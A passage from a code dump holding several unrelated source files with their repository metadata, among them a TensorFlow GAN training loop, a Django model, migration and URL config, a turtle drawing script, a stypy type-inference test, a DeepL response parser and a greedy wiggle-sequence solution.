# leakyReLU function
lr2 = leaky_relu(gn2, alpha=0.2)
with tf.name_scope("D_layer3"): # layer3 conv3
wd3 = tf.get_variable('wd3', [4, 4, 64, 128], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd3 = tf.get_variable('bd3', [128], initializer=tf.constant_initializer(0.0))
scaled3 = tf.get_variable('sd3', [128], initializer=tf.constant_initializer(1.0))
betad3 = tf.get_variable('bed3', [128], initializer=tf.constant_initializer(0.0))
conv3 = tf.nn.conv2d(lr2, wd3, strides=[1, 2, 2, 1], padding="SAME", name='D_conv3') + bd3
# batch normalization
batch_mean3, batch_var3 = tf.nn.moments(conv3, [0, 1, 2])
bn3 = tf.nn.batch_normalization(conv3, batch_mean3, batch_var3, betad3, scaled3, 0.0001, name='D_BN3')
# gaussian noise
gn3 = gaussian_noise(bn3, 0.3)
# leakyReLU function
lr3 = leaky_relu(gn3, alpha=0.2)
with tf.name_scope("D_layer4"): # layer4 conv4
wd4 = tf.get_variable('wd4', [4, 4, 128, 256], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd4 = tf.get_variable('bd4', [256], initializer=tf.constant_initializer(0.0))
scaled4 = tf.get_variable('sd4', [256], initializer=tf.constant_initializer(1.0))
betad4 = tf.get_variable('bed4', [256], initializer=tf.constant_initializer(0.0))
conv4 = tf.nn.conv2d(lr3, wd4, strides=[1, 2, 2, 1], padding="SAME", name='D_conv4') + bd4
# batch normalization
batch_mean4, batch_var4 = tf.nn.moments(conv4, [0, 1, 2])
bn4 = tf.nn.batch_normalization(conv4, batch_mean4, batch_var4, betad4, scaled4, 0.0001, name='D_BN4')
# gaussian noise
gn4 = gaussian_noise(bn4, 0.3)
# leakyReLU function
lr4 = leaky_relu(gn4, alpha=0.2)
with tf.name_scope("D_layer5"): # layer5 conv5
wd5 = tf.get_variable('wd5', [4, 4, 256, 512], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd5 = tf.get_variable('bd5', [512], initializer=tf.constant_initializer(0.0))
scaled5 = tf.get_variable('sd5', [512], initializer=tf.constant_initializer(1.0))
betad5 = tf.get_variable('bed5', [512], initializer=tf.constant_initializer(0.0))
conv5 = tf.nn.conv2d(lr4, wd5, strides=[1, 2, 2, 1], padding="SAME", name='D_conv5') + bd5
# batch normalization
batch_mean5, batch_var5 = tf.nn.moments(conv5, [0, 1, 2])
bn5 = tf.nn.batch_normalization(conv5, batch_mean5, batch_var5, betad5, scaled5, 0.0001, name='D_BN5')
# gaussian noise
gn5 = gaussian_noise(bn5, 0.3)
# leakyReLU function
lr5 = leaky_relu(gn5, alpha=0.2)
# reshape [n, 4, 4, 512] -> nx4x4x512
re5 = tf.reshape(lr5, [-1, 4 * 4 * 512])
with tf.name_scope("D_layer6"): # layer6 linear
wd6 = tf.get_variable('wd6', [512 * 4 * 4, 1], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd6 = tf.get_variable('bd6', [1], initializer=tf.constant_initializer(0.0))
fc6 = tf.matmul(re5, wd6, name='G_fc6') + bd6
# norm_L2 = tf.nn.l2_loss(wd1) + tf.nn.l2_loss(wd2) + tf.nn.l2_loss(wd3) + tf.nn.l2_loss(wd4) + tf.nn.l2_loss(wd5) \
# + tf.nn.l2_loss(wd6)
# return out_dis, norm_L2
return fc6
z_ = tf.placeholder(tf.float32, [None, NOISE_UNIT_NUM], name='z_') #noise to generator
x_ = tf.placeholder(tf.float32, [None, 64, 64, 3], name='x_') #image to classifier
d_dis_g_ = tf.placeholder(tf.float32, [None, 1], name='d_dis_g_') #target of discriminator related to generator
d_dis_r_ = tf.placeholder(tf.float32, [None, 1], name='d_dis_r_') #target of discriminator related to real image
# stream around generator
x_gen = generator(z_, reuse=False)
#stream around discriminator
out_dis_g = discriminator(x_gen, reuse=False) #from generator
out_dis_r = discriminator(x_, reuse=True) #real image
with tf.name_scope("loss"):
loss_dis_g = tf.reduce_mean(tf.square(out_dis_g - d_dis_g_), name='Loss_dis_gen') #loss related to generator
loss_dis_r = tf.reduce_mean(tf.square(out_dis_r - d_dis_r_), name='Loss_dis_rea') #loss related to real imaeg
#total loss of discriminator
loss_dis_total = loss_dis_g + loss_dis_r
#total loss of generator
loss_gen_total = loss_dis_g * 2.0
tf.summary.scalar('loss_dis_total', loss_dis_total)
tf.summary.scalar('loss_gen_total', loss_gen_total)
merged = tf.summary.merge_all()
# t_vars = tf.trainable_variables()
g_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="generator")
d_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="discriminator")
with tf.name_scope("train"):
train_dis = tf.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5).minimize(loss_dis_total, var_list=d_vars
# var_list=[wd1, wd2, wd3, wd4, wd5, wd6, bd1, bd2, bd3, bd4, bd5, bd6]
, name='Adam_dis')
train_gen = tf.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5).minimize(loss_gen_total, var_list=g_vars
# var_list=[wg1, wg3, wg5, bg1, bg3, bg5, betag2, scaleg2, betag4, scaleg4]
, name='Adam_gen')
sess = tf.Session()
sess.run(tf.global_variables_initializer())
summary_writer = tf.summary.FileWriter(BOARD_DIR_NAME, sess.graph)
#training loop
for epoch in range(0, EPOCH):
sum_loss_gen = np.float32(0)
sum_loss_dis = np.float32(0)
sum_loss_dis_r = np.float32(0)
sum_loss_dis_g = np.float32(0)
len_data = make_datasets.make_data_for_1_epoch()
for i in range(0, len_data, BATCH_SIZE):
img_batch = make_datasets.get_data_for_1_batch(i, BATCH_SIZE)
z = make_datasets.make_random_z_with_norm(NOISE_MEAN, NOISE_STDDEV, len(img_batch), NOISE_UNIT_NUM)
tar_g_1 = make_datasets.make_target_1_0(1.0, len(img_batch))
tar_g_0 = make_datasets.make_target_1_0(0.0, len(img_batch))
#train discriminator
sess.run(train_dis, feed_dict={z_:z, x_: img_batch, d_dis_g_: tar_g_0, d_dis_r_: tar_g_1})
#train generator
sess.run(train_gen, feed_dict={z_:z, d_dis_g_: tar_g_1})
loss_gen_total_ = sess.run(loss_gen_total, feed_dict={z_: z, d_dis_g_: tar_g_1})
loss_dis_total_, loss_dis_r_, loss_dis_g_ = sess.run([loss_dis_total, loss_dis_r, loss_dis_g],
feed_dict={z_:z, x_: img_batch, d_dis_g_: tar_g_0, d_dis_r_: tar_g_1})
#for tensorboard
merged_ = sess.run(merged, feed_dict={z_:z, x_: img_batch, d_dis_g_: tar_g_0, d_dis_r_: tar_g_1})
summary_writer.add_summary(merged_, epoch)
sum_loss_gen += loss_gen_total_
sum_loss_dis += loss_dis_total_
sum_loss_dis_r += loss_dis_r_
sum_loss_dis_g += loss_dis_g_
print("----------------------------------------------------------------------")
print("epoch = {:}, Generator Total Loss = {:.4f}, Discriminator Total Loss = {:.4f}".format(
epoch, sum_loss_gen / len_data, sum_loss_dis / len_data))
print("Discriminator Real Loss = {:.4f}, Discriminator Generated Loss = {:.4f}".format(
sum_loss_dis_r / len_data, sum_loss_dis_g / len_data))
if epoch % 10 == 0:
z_test = make_datasets.initial_noise
gen_images = sess.run(x_gen, feed_dict={z_:z_test})
Utility.make_output_img(gen_images, int(TEST_DATA_SAMPLE ** 0.5) ,out_image_dir, epoch, LOGFILE_NAME)
|
[
"takamitsu.ohmasa@automagi.jp"
] |
takamitsu.ohmasa@automagi.jp
|
a052fe4863ca0a8bd3eadc1ce067c0397d7da66a
|
f2a7d668a3c359f86b07f23d5beba5cb6a0bb5f4
|
/Beginner/numberMirror.py
|
0354fbc1708a92545c7aac6a2506a522dad3e976
|
[] |
no_license
|
deblina23/CodeChef
|
cbe4280ebec446685bfb0a3ea3322214126297b3
|
ceaca18defb7556c29e243c6b6ec736f663f3e56
|
refs/heads/master
| 2023-03-10T21:31:27.995069
| 2021-02-25T21:38:37
| 2021-02-25T21:38:37
| 336,050,803
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
#!/usr/bin/env python3
def readNumber():
number = int(input())
return(number)
def checkRange(number):
    return number >= 0 and number <= pow(10, 5)
def printNumber(number):
    if checkRange(number):
        print(number)
if __name__ == "__main__":
    number = readNumber()
    printNumber(number)
|
[
"deblina.ghosh.kolkata@gmail.com"
] |
deblina.ghosh.kolkata@gmail.com
|
5c4f8cbe73ec084c1608b7821080c56ba3a202b3
|
eb3683f9127befb9ef96d8eb801206cf7b84d6a7
|
/stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/chr/error_chr_return_type.py
|
6c0680a7395028a90a275f021b42741f3f8bd809
|
[] |
no_license
|
ComputationalReflection/stypy
|
61ec27333a12f76ac055d13f8969d3e0de172f88
|
be66ae846c82ac40ba7b48f9880d6e3990681a5b
|
refs/heads/master
| 2021-05-13T18:24:29.005894
| 2018-06-14T15:42:50
| 2018-06-14T15:42:50
| 116,855,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "chr builtin is invoked and its return type is used to call an non existing method"
3:
4: if __name__ == '__main__':
5: # Call options
6: # (Integer) -> <type 'str'>
7: # (Overloads__trunc__) -> <type 'str'>
8:
9:
10: # Call the builtin
11: # No error
12: ret = chr(4)
13:
14: # Type error
15: ret.unexisting_method()
16:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'chr builtin is invoked and its return type is used to call an non existing method')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)
if (__name__ == '__main__'):
# Assigning a Call to a Name (line 12):
# Call to chr(...): (line 12)
# Processing the call arguments (line 12)
int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 12, 14), 'int')
# Processing the call keyword arguments (line 12)
kwargs_4 = {}
# Getting the type of 'chr' (line 12)
chr_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 10), 'chr', False)
# Calling chr(args, kwargs) (line 12)
chr_call_result_5 = invoke(stypy.reporting.localization.Localization(__file__, 12, 10), chr_2, *[int_3], **kwargs_4)
# Assigning a type to the variable 'ret' (line 12)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 12, 4), 'ret', chr_call_result_5)
# Call to unexisting_method(...): (line 15)
# Processing the call keyword arguments (line 15)
kwargs_8 = {}
# Getting the type of 'ret' (line 15)
ret_6 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 4), 'ret', False)
# Obtaining the member 'unexisting_method' of a type (line 15)
unexisting_method_7 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 15, 4), ret_6, 'unexisting_method')
# Calling unexisting_method(args, kwargs) (line 15)
unexisting_method_call_result_9 = invoke(stypy.reporting.localization.Localization(__file__, 15, 4), unexisting_method_7, *[], **kwargs_8)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
[
"redondojose@uniovi.es"
] |
redondojose@uniovi.es
|
5b95e0f5bd0781c50512249533f5bf7221c82ec2
|
227b4fa87c66c9e8e0d159a69e4b86c1c1c910fc
|
/python/ex.py
|
42beae8470046bb8024a5dbf517808a98b139a30
|
[] |
no_license
|
hiddenace0-0/Noob-Projects
|
935e7c87ab87d955401d4468446ca776dff12bc0
|
3cd11f1b5f636d6401ada3e415c62aeb28a4cb43
|
refs/heads/main
| 2023-08-10T18:06:27.450708
| 2021-09-10T14:28:22
| 2021-09-10T14:28:22
| 395,020,022
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
import requests
import json
response = requests.get('https://api.stackexchange.com//2.3/questions?order=desc&sort=activity&site=stackoverflow')
print(response.json())
|
[
"hiddenacez@Aces-Air.cogeco.local"
] |
hiddenacez@Aces-Air.cogeco.local
|
c33dfbd20e756cd9430e020afe1364b92bc051ef
|
0dd3e1a1d78b3a74b336f7082306eff82528d2b3
|
/pyext/professor2/ipolio.py
|
dee1e2555579acf4be09a9db6cad30c1ad66cad1
|
[
"MIT"
] |
permissive
|
iamholger/professor
|
5306db0f9534b159bb98bb31db04aba7b7ce10bc
|
25753a19de0dbbd2db0eb80cedc87adc017459a1
|
refs/heads/master
| 2020-06-14T08:14:46.805475
| 2019-02-04T20:55:14
| 2019-02-04T20:55:14
| 75,209,672
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,091
|
py
|
# -*- python -*-
from professor2.errors import *
from professor2.ipol import *
from professor2.histos import *
class IpolMeta(dict):
def __init__(self, ifile=None):
if ifile:
self.update(self.read_ipolmeta(ifile))
@property
def dim(self):
return int(self.get("Dimension", -1))
@property
def pnames(self):
return self.get("ParamNames", "").split()
@property
def pvalsmin(self):
return [float(x) for x in self.get("MinParamVals", "").split()]
@property
def pvalsmax(self):
return [float(x) for x in self.get("MaxParamVals", "").split()]
@property
def numinputs(self):
return int(self.get("NumInputs", -1))
def read_ipolmeta(self, ifile):
"""
Read in meta data from prof-ipol output 'ifile'
"""
meta = {}
if type(ifile) == str:
ifile=open(ifile)
ifile.seek(0)
for l in ifile.readlines():
## Strip out comments
if "#" in l:
l = l[:l.find("#")]
## Ignore blank / pure whitespace lines
l = l.strip()
if not l:
continue
## Exit if we see the end-of-header indicator
if l == "---":
break
## Extract the key-value pair from the line
try:
key, value = [str.strip(s) for s in l.split(":", 1)]
meta[key] = value
except:
print "Couldn't extract key-value pair from '%s'" % l
return meta
def read_ipolmeta(ifile):
return IpolMeta(ifile)
def read_simpleipols(ifile, paramlimits=None):
"""
Read ipol data back in from ifile.
If the paramlimits argument is non-null, it will be used internally by
the Ipol objects to stabilise the SVD calculation. For this to make sense,
the persisted ipols must have been created with the same scaling factors.
paramlimits should be a 2-tuple of lists for min and max param values
respectively.
"""
IOBJECTS = {}
if type(ifile) == str:
ifile=open(ifile)
ifile.seek(0)
name = ""
for line in ifile.readlines():
sline = line.strip()
if sline.startswith("/"):
name = sline.split()[0]
elif sline.startswith("val"):
IOBJECTS[name] = Ipol(sline)
if paramlimits:
IOBJECTS[name].setParamLimits(*paramlimits)
return IOBJECTS
def read_binnedipols(ifile, paramlimits=None):
"""
Read binned ipol data back in from ifile.
If the paramlimits argument is non-null, it will be used internally by
the Ipol objects to stabilise the SVD calculation. For this to make sense,
the persisted ipols must have been created with the same scaling factors.
paramlimits should be a 2-tuple of lists for min and max param values
respectively.
"""
IHISTOS = {}
if type(ifile) == str:
ifile=open(ifile)
ifile.seek(0)
name = ""
for line in ifile.readlines():
sline = line.strip()
if sline.startswith("/"):
fullpath, sxmin, sxmax = sline.split()
hpath, nbin = fullpath.split("#")
currentib = IpolBin(float(sxmin), float(sxmax), n=int(nbin))
IHISTOS.setdefault(hpath, IpolHisto(path=hpath)).bins.append(currentib)
elif sline.startswith("val"):
currentib.ival = Ipol(sline)
if paramlimits:
currentib.ival.setParamLimits(*paramlimits)
#print currentib.ival.coeffs()
elif sline.startswith("err"):
currentib.ierrs = Ipol(sline)
if paramlimits:
currentib.ierrs.setParamLimits(*paramlimits)
#print currentib.ierrs.coeffs()
# TODO: read back asymm errs as two ipols
return IHISTOS
def read_ipoldata(ifile):
"Return both the metadata object and collection of IpolHistos from a binned ipol file"
imeta = read_ipolmeta(ifile)
if not imeta["DataFormat"].startswith('binned'):
raise IpolIOError("Error, DataFormat of ipol file %s is not binned" % ifile)
df = int(imeta["DataFormat"].split()[-1])
if df<2:
raise IpolIOError("Error, DataFormat '%s' of ipol file %s is not supported by this version of Professor, please recalculate parametrisations." %(imeta["DataFormat"] ,ifile))
paramlimits = None
if bool(int(imeta.get("DoParamScaling", 0))):
if imeta["DataFormat"].endswith('2'):
assert imeta.has_key("MinParamVals") and imeta.has_key("MaxParamVals")
minparamvals = [float(s) for s in imeta["MinParamVals"].split()]
maxparamvals = [float(s) for s in imeta["MaxParamVals"].split()]
paramlimits = (minparamvals, maxparamvals)
# Note, in format 3, the min max values are stored at the end of the coefficient vector
# the Ipol.setParamLimits function is protected agains overwriting those limits
# when reading in format 3
return read_binnedipols(ifile, paramlimits), imeta
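# Hedged usage sketch (added for illustration; the file name below is a placeholder,
# not part of the original module). read_ipoldata() returns the dict of IpolHistos
# keyed by histogram path together with the metadata object:
#
#     ihistos, imeta = read_ipoldata("prof_ipol.dat")
#     for hpath, ihisto in ihistos.items():
#         print hpath, len(ihisto.bins)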
|
[
"holger.schulz@durham.ac.uk"
] |
holger.schulz@durham.ac.uk
|
ccd5789da2e4c9864253749d6c74723de2dba159
|
15797ff64b716561d067db5f7d8ad7b7a7d86354
|
/apps/puppies/main/cyclone.py
|
6c0f0354e55c51f15e097bbccf4fa8a0ac939626
|
[
"MIT"
] |
permissive
|
cloudacademy/lab-utils
|
27be7c0d4a87140929250afb3b95b73f066d0082
|
4af0d22ca9a4a7f59bf5d0d02516074496ca6437
|
refs/heads/master
| 2022-12-16T01:42:52.143567
| 2021-06-02T15:49:29
| 2021-06-02T15:49:29
| 71,278,089
| 3
| 4
|
MIT
| 2022-12-07T23:40:12
| 2016-10-18T18:19:55
|
HTML
|
UTF-8
|
Python
| false
| false
| 329
|
py
|
from tornado.wsgi import WSGIContainer
from tornado.ioloop import IOLoop
from tornado.web import FallbackHandler, Application
from app import app
tr = WSGIContainer(app)
application = Application([
(r".*", FallbackHandler, dict(fallback=tr)),
])
if __name__ == "__main__":
application.listen(80)
IOLoop.instance().start()
|
[
"ericovis@gmail.com"
] |
ericovis@gmail.com
|
d1b0c749706d3e9f92703bdbaa8971e4b3b16169
|
8892b25314a97c48426220f0d60d34a4c11bbf99
|
/lista/migrations/0003_post_done.py
|
b97259844a768135f6412c13edc69a87d1950191
|
[] |
no_license
|
mateoosh92/my-first-blog
|
82413b01a0c7627c4cda771f94491ace12b6190b
|
a7f7986a588bf53a9eeca1d3f1cc638d1cea7799
|
refs/heads/master
| 2020-04-16T10:17:30.552068
| 2019-01-16T14:06:10
| 2019-01-16T14:06:10
| 165,498,853
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
# Generated by Django 2.1.5 on 2019-01-16 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lista', '0002_auto_20190112_1908'),
]
operations = [
migrations.AddField(
model_name='post',
name='done',
field=models.BooleanField(default=True),
),
]
|
[
"mmaliszewski92@gmail.com"
] |
mmaliszewski92@gmail.com
|
c5e35b6297eb463bcbf83b9b4c9e1ab03d0934c0
|
8687f1f05d92099d0fe5438c4d4d398f8b7cfbf2
|
/blog/models.py
|
fab2ec11871adbf37feab38d5f5694a0d91b6732
|
[] |
no_license
|
yoandresaav/Mircopayments_Systems-Bitcoin-blockchain-
|
5c42d1ecfffd71599a8cb5777091a57a266f6ce4
|
8d32ccac7d005efc966b98ebc787cc7162557bd5
|
refs/heads/master
| 2022-08-21T14:48:43.232923
| 2020-05-26T18:30:28
| 2020-05-26T18:30:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Post(models.Model):# class name is capital. remember that!
title = models.CharField(max_length=30)
tag= models.CharField(max_length=30)
post = models.TextField()
thetime = models.CharField(max_length=12 ,default ="Pre-historic")
writer = models.CharField(max_length=40, default="")
def __str__(self):
return self.title +"|" + str(self.pk)
|
[
"32956678+talktovik@users.noreply.github.com"
] |
32956678+talktovik@users.noreply.github.com
|
e7dd0f7b222db9458f0563e7fdd73a09effbfee1
|
733503f366825edf5f9c12f9d506af327bbb32c9
|
/mysite/urls.py
|
9de2ad9a615de7d454bb68cfa2f44dad7dbaa1d0
|
[] |
no_license
|
momo2010/mysite
|
5a0be098cf79a420921888c05bed13aa067006da
|
7c0756c5d1f2d03d4086e2b6e09dbb2e787cee97
|
refs/heads/master
| 2021-06-28T08:38:34.456649
| 2017-09-18T01:45:18
| 2017-09-18T01:45:18
| 103,877,292
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from cmdb import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^index/', views.index),
# url(r'^page/(\d+)', views.page),
url(r'^page/(?P<page>\d+)/(?P<number>\d+)', views.page),
]
|
[
"ppjob@github.com"
] |
ppjob@github.com
|
5aaac03e9abb2d9aa266b4cf69c3fc08101f9d61
|
d1fe787f5970fddcc8ddace34ed885d4c786e233
|
/week 1/drawFlower.py
|
0fb0b7ba0ac0ac3ec4871025e778948dd8a698b0
|
[] |
no_license
|
astraub2/CIS210
|
e7a032883869026aa266efb7ed5d88cd328456af
|
1a50b97a1541141190c3dea5d8ec74f336cccf5d
|
refs/heads/master
| 2021-01-21T06:39:44.856018
| 2017-02-27T04:06:28
| 2017-02-27T04:06:28
| 83,266,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,490
|
py
|
"""
drawflower.py: Draw flower from multiple squares using Turtle graphics
Authors: Amber Straub 95133723
Credits:
CIS 210 assignment 1, Fall 2015.
"""
import argparse # Used in main program to get numSquares and sideLength
# from command line
import time # Used in main program to pause program before exit
import turtle # using turtle graphics
## Constants used by this program
#drawSquare function from page 34 of Miller and Ranum
def drawFlower(myturtle, numSquares, sideLength):
    """Draw numSquares squares of side sideLength on the given turtle, rotating between squares."""
    angle = 360 / numSquares
    for i in range(numSquares):
        for j in range(4):
            myturtle.forward(sideLength)
            myturtle.right(90)
        myturtle.right(angle)
def main():
"""
Interaction if run from the command line.
Magic for now; we'll look at what's going on here
in the next week or two.
"""
parser = argparse.ArgumentParser(description="Draw flower using squares")
parser.add_argument("numSquares", type=int,
help="number of squares to use (an integer)")
parser.add_argument("sideLength", type=int,
help="length of side for each square (an integer)")
args = parser.parse_args() # gets arguments from command line
numSquares = args.numSquares
sideLength = args.sideLength
myTurtle = turtle.Turtle()
drawFlower(myTurtle, numSquares, sideLength)
time.sleep(10) # delay for 10 seconds
if __name__ == "__main__":
main()
|
[
"astraub2@uoregon.edu"
] |
astraub2@uoregon.edu
|
d80e2c7471b8fbfd17d1424ea85674f46384669c
|
3c7ce2f591fac6c17a41595a8ab6b7ed831afbe9
|
/deepl/extractors.py
|
551b5ef7f8083e84c6329e89e444ab214b70cb6a
|
[
"MIT"
] |
permissive
|
saatanpion/Discord_Translator_2room
|
5c6a2aa5cbfa30bb21f6c89fca087085995225a4
|
f1d4abe8acf3377c63369b3a4009652e40e28c62
|
refs/heads/main
| 2023-07-01T03:30:08.504258
| 2021-07-29T07:01:19
| 2021-07-29T07:01:19
| 389,615,332
| 0
| 0
|
MIT
| 2021-07-26T11:53:04
| 2021-07-26T11:53:04
| null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
def extract_translated_sentences(json_response):
translations = json_response["result"]["translations"]
translated_sentences = [
translation["beams"][0]["postprocessed_sentence"]
for translation in translations
]
return translated_sentences
def extract_split_sentences(json_response):
return json_response["result"]["splitted_texts"][0]
|
[
"sayonari@pontanuMBA2021.local"
] |
sayonari@pontanuMBA2021.local
|
b6b57348dc2be8a8685ef79ea553cdb8ddee01d5
|
592f4a21b94bf0aaec6983593063ca593d484276
|
/lambdafunction.py
|
2257cf725561340920a26c2a18d15ca752c7341d
|
[] |
no_license
|
ayobablo/Steinserve-python-assignments
|
4ab657b7b19b3a3b2a40d0546039de3a787d3e08
|
f9a03f1bea49025c4c02902dde5b0a23a083a125
|
refs/heads/master
| 2020-12-21T23:16:54.293174
| 2020-01-27T21:51:45
| 2020-01-27T21:51:45
| 236,596,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 74
|
py
|
gg= lambda x:x+2
print (gg(1))
aa=lambda x,y,z:x+y+z
print(aa(1,2,3))
|
[
"noreply@github.com"
] |
ayobablo.noreply@github.com
|
969548608d601ec25b5bd267991480426c174433
|
9b0bdebe81e558d3851609687e4ccd70ad026c7f
|
/算法思想/贪心法/03.摇摆序列.py
|
d9f3e2f8193e6552ada3ed605107ffa9e21e059c
|
[] |
no_license
|
lizenghui1121/DS_algorithms
|
645cdad007ccbbfa82cc5ca9e3fc7f543644ab21
|
9690efcfe70663670691de02962fb534161bfc8d
|
refs/heads/master
| 2022-12-13T22:45:23.108838
| 2020-09-07T13:40:17
| 2020-09-07T13:40:17
| 275,062,257
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,327
|
py
|
"""
描述:
一个整数序列,如果相邻元素的差恰好正负(负正)交替出现,则认为是摇摆序列,少于2个元素的序列直接是摇摆序列
给一个随机序列,求满足摇摆序列的定义的最长子序列的长度。
示例:
序列1:[1, 7, 4, 9, 2, 5] 摇摆序列:[6, -3, 5, -7, 3]
@Author: Li Zenghui
@Date: 2020-03-31 16:20
"""
# 贪心规律:当序列有一段连续递增或者递减时候,为形成摇摆序列,只保留递增(递减)序列的首尾元素。
def wiggle_max_length(nums):
if len(nums) < 2:
return len(nums)
state = 'begin'
max_length = 1
for i in range(1, len(nums)):
if state == 'begin':
if nums[i-1] < nums[i]:
state = 'up'
max_length += 1
elif nums[i-1] > nums[i]:
state = 'down'
max_length += 1
elif state == 'up':
if nums[i-1] > nums[i]:
state = 'down'
max_length += 1
else:
if nums[i-1] < nums[i]:
state = 'up'
max_length += 1
return max_length
if __name__ == '__main__':
print(wiggle_max_length([1, 5, 2, 10, 9, 8]))
print(wiggle_max_length([1, 1, 2, 3, 5, 8]))
print(wiggle_max_length([5, 8, 3]))
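# Illustrative trace of the greedy scan above (added example, not part of the original file):
# [1, 5, 2, 10, 9, 8] -> up, down, up, down -> length 5
# [1, 1, 2, 3, 5, 8]  -> a single increasing run, only its endpoints count -> length 2
# [5, 8, 3]           -> up, down -> length 3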
|
[
"954267393@qq.com"
] |
954267393@qq.com
|
06038bdfb65cdd0a5211554888e826f071ed73cb
|
8492f9a7c15e8127b05ed826194c4ef9a6023a1a
|
/17/solution.py
|
5a8bca2a03fd50c3d0b0e58c88d2d124bfdf1817
|
[] |
no_license
|
jobe0900/adventofcode2015
|
1eff50be50ac9118d6dd33e13d9c4e25396c2fa4
|
6989c463cc2c2332fef5982e970d2b5c8b7313d0
|
refs/heads/master
| 2021-01-10T09:52:59.866950
| 2016-02-05T13:34:26
| 2016-02-05T13:34:26
| 51,148,089
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,809
|
py
|
#!/usr/bin/env python3
import itertools
def test():
target = 25
with open("testdata") as f:
lines = f.readlines()
containers = parse_lines(lines)
print("Containers: {}".format(containers))
combs = find_combinations(containers, target)
print("FOUND combinations:")
for c in combs:
print(" {}".format(c))
def first(lines):
target = 150
containers = parse_lines(lines)
combs = find_combinations(containers, target)
print("1. Found {} combinations".format(len(combs)))
return combs
def second(lines):
target = 150
containers = parse_lines(lines)
combs = find_combinations(containers, target)
min_nr_bottles = find_min_nr_bottles_in_combination(combs)
nr_combs_with_min = find_nr_minimal_combinations(min_nr_bottles, combs)
print("2. {} combinations with {} number of bottles".format(nr_combs_with_min, min_nr_bottles))
def find_min_nr_bottles_in_combination(combs):
min_nr_bottles = float('Inf')
for c in combs:
if len(c) < min_nr_bottles:
min_nr_bottles = len(c)
return min_nr_bottles
def find_nr_minimal_combinations(min_nr_bottles, combs):
nr_combs_with_min = 0
for c in combs:
if len(c) == min_nr_bottles:
nr_combs_with_min += 1
return nr_combs_with_min
def find_combinations(containers, target):
combs = []
    for i in range(len(containers) + 1):  # +1 so the combination using every container is also considered
for comb in itertools.combinations(containers, i):
if sum(comb) == target:
combs.append(comb)
return combs
def parse_lines(lines):
c = []
for line in lines:
c.append(int(line.strip()))
return c
if __name__ == "__main__":
#test()
with open("input") as f:
lines = f.readlines()
first(lines)
second(lines)
|
[
"jobe0900@student.miun.se"
] |
jobe0900@student.miun.se
|
d9f730da7e25eea9b9cbf3b8ca91929fd4f0b8d3
|
35948cb9eadfd2d6ed80361bedbe1579d9712f35
|
/fileupload/templatetags/upload_tags.py
|
fd421596fedefebe74fc3aa342ccb647aeff9d66
|
[] |
no_license
|
KomeijiSatori/mysite
|
010e2e6210a91e683c133d54eec762ba593fd2eb
|
8565018a30a81fc32d904e57b2347f2e24a726c0
|
refs/heads/master
| 2021-04-06T10:48:59.865827
| 2020-08-28T16:45:03
| 2020-08-28T16:45:03
| 83,221,335
| 5
| 1
| null | 2018-02-14T09:01:47
| 2017-02-26T15:58:19
|
Python
|
UTF-8
|
Python
| false
| false
| 3,497
|
py
|
from django import template
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
register = template.Library()
@register.simple_tag
def upload_js():
return mark_safe("""
<!-- The template to display files available for upload -->
<script id="template-upload" type="text/x-tmpl">
{% for (var i=0, file; file=o.files[i]; i++) { %}
